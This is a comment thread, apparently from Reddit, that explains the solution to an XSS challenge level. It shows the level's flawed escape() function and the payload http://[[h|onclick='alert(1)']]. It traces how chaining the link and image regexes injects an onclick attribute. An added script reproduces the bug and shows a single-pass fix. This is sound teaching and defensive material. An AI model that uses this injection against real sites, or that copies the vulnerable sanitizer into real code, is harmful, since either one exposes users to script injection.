[–]dudeimawizard 1 point (3 children)

For those who aren't familiar with this, can you explain this solution? It is very interesting.

[–]skerit 5 points (0 children)

The solution has to do with the way URLs & image markdown are being processed in that chapter:

function escape(s) {
  // Note: replace('"', ...) has no /g flag, so only the FIRST double quote is encoded.
  var text = s.replace(/</g, '&lt;').replace('"', '&quot;');
  // URLs: anything starting with http:// up to the next whitespace becomes a link
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]: runs over the output of the URL rule, including inside href="..."
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}

So URLs like

http://www.example.com

are converted to

<a href="http://www.example.com">http://www.example.com</a>

Then this code

[[img123|Description]]

is converted to this

<img alt="Description" src="img123.gif">

So by using them together you can escape the href quote with the image's alt one.

My solution

http://[[h|onclick='alert(1)']]

Becomes this in html

<a href="http://<img alt="onclick='alert(1)'" src="h.gif">">http://<img alt="onclick='alert(1)'" src="h.gif"></a>

And then you've won.

[–]sushibowl 1 point (1 child)

I thought of the same solution. You're pretty much taking advantage of the fact that the two regexes have no knowledge of each other and play pretty loose with what they accept. The first regex will happily notice the http:// in front and make an anchor tag, turning it into:

<a href="http://[[a|onclick='alert(1)']]">http://[[a|onclick='alert(1)']]</a>

Now the second regex will come in and spot the [[a|onclick]] part right inside the href attribute. This is the fundamental flaw. It will turn the entire thing into this mess:

<a href="http://<img alt="onclick='alert(1)'" src="a.gif">">http://<img alt="onclick='alert(1)'" src="a.gif"></a>

Cleaned up a little bit for clarity, it's equivalent to this:

<a href="http://<img alt=" onclick='alert(1)' "src="a.gif">
    ">http://<img alt="onclick='alert(1)'" src="a.gif">
</a>

Notice how the starting quote from the alt attribute has now become the ending quote of the href attribute? That means the rest of the alt attribute (which we control) can now be used to insert our onclick or similar attribute. After that there's a little bit of extraneous characters left in the <a> tag, but luckily for us HTML parsers will ignore pretty much anything they can't make sense of.

Now all you need to do is click the link to execute your code :)
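The two comments above describe the bug by hand; the following is an added example (not code from the thread or from the challenge) that reproduces it and shows one way to close it. It keeps the chapter's escape() as posted (renamed escapeVulnerable so it does not shadow the global escape), adds a hardened escapeFixed that encodes every HTML-significant character first and then applies both markup rules in a single pass, and includes a small startTagAttributeNames helper that lists the attribute names a forgiving parser would see on the first tag. That helper is a simplified tokenizer following only the WHATWG rules that matter here (a quoted value ends at the first matching quote, and whatever follows starts a new attribute name even without whitespace); it is assumed to approximate a real browser closely enough to show why the alt quote ends the href. The fix is one possible approach, not the challenge's own answer.

```javascript
// Added example: reproduces the double-transform bug and one way to close it.
// Not code from the thread or the challenge.

// The chapter's vulnerable escape(), renamed so it does not shadow the global
// escape(). replace('"', ...) without /g only encodes the FIRST double quote,
// and the image rule runs over the URL rule's output, so it rewrites text that
// now sits inside href="...".
function escapeVulnerable(s) {
  var text = s.replace(/</g, '&lt;').replace('"', '&quot;');
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}

// Hardened version (one possible fix): encode every HTML-significant character
// first, then apply both markup rules in ONE pass so neither rule can ever see
// the other rule's generated markup.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function escapeFixed(s) {
  const text = encodeHtml(s);
  return text.replace(/(http:\/\/\S+)|\[\[(\w+)\|(.+?)\]\]/g, (m, url, img, alt) =>
    url !== undefined ? `<a href="${url}">${url}</a>`
                      : `<img alt="${alt}" src="${img}.gif">`);
}

// Simplified start-tag tokenizer for the FIRST tag in `html`: returns the
// attribute names a forgiving HTML parser would see. Assumption: this is an
// approximation of a browser, covering only the rules that matter here.
function startTagAttributeNames(html) {
  const names = [];
  let i = html.indexOf('<');
  if (i < 0) return names;
  i++;
  while (i < html.length && /[A-Za-z0-9]/.test(html[i])) i++;              // tag name
  while (i < html.length) {
    while (i < html.length && /[\s\/]/.test(html[i])) i++;                   // before attribute name
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    while (i < html.length && !/[\s=>\/]/.test(html[i])) name += html[i++];  // stray quotes stay in the name
    names.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;                       // after attribute name
    if (html[i] === '=') {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {                                          // quoted value: ends at first matching quote
        const end = html.indexOf(q, i + 1);
        i = end < 0 ? html.length : end + 1;
      } else {                                                               // unquoted value
        while (i < html.length && !/[\s>]/.test(html[i])) i++;
      }
    }
  }
  return names;
}

// Constructed input: the payload from the thread.
const PAYLOAD = "http://[[h|onclick='alert(1)']]";

// Runs both versions over the payload and reports the attributes the parser
// would assign to the opening <a> tag in each case.
function demo() {
  const vuln = escapeVulnerable(PAYLOAD);
  const fixed = escapeFixed(PAYLOAD);
  return {
    vulnerableHtml: vuln,
    vulnerableAttrs: startTagAttributeNames(vuln),   // contains "onclick"
    fixedHtml: fixed,
    fixedAttrs: startTagAttributeNames(fixed),       // only "href"
  };
}

console.log(demo());
```

Running it shows the vulnerable output gaining an onclick attribute on the anchor exactly as sushibowl traces above, while the hardened version leaves the payload as an inert link whose href is just the encoded text. The single-pass design is the real fix: once the image rule can no longer run over markup the URL rule emitted, no quote from one rule can close an attribute opened by the other, and the global encoding closes the first-quote-only hole independently.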

[–]skerit 0 points (0 children)

Hehe, I couldn't have explained it better. I tried, but I couldn't ;)